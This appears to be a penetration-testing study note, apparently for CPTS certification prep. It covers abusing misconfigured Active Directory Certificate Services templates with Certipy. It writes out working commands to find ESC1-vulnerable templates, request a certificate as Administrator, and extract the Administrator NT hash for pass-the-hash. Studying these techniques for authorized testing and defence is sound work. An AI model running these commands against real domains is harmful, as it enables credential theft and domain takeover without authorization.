ZeroBox

Active Directory Certificate Services (AD CS) Abuse

Active Directory Certificate Services (AD CS) misconfiguration discovery and exploitation using Certipy (ESC1-ESC13).

certipypkinit

AD CS provides PKI capabilities for Active Directory. Misconfigured certificate templates grant low-privileged users the ability to impersonate Domain Administrators.

1. Vulnerability Discovery

Scan the domain for vulnerable certificate templates:

certipy find -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -vulnerable -stdout

2. ESC1 Abuse (Enrollee Supplies Subject / Client Auth)

Request a certificate for Administrator:

certipy req -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -ca {CA_NAME} -template ESC1_Template -upn Administrator@{DOMAIN}

3. Authenticate & Obtain NT Hash

Authenticate with the generated PFX certificate to extract the Administrator's NT hash:

certipy auth -pfx administrator.pfx -dc-ip {TARGET_IP}

Use the acquired NT hash for Pass-The-Hash execution via 06. Active Directory Attack Paths & Domain Enumeration.

More CPTS notes

Keep these notes in your own private vault. Open CPTS notes in ZeroBox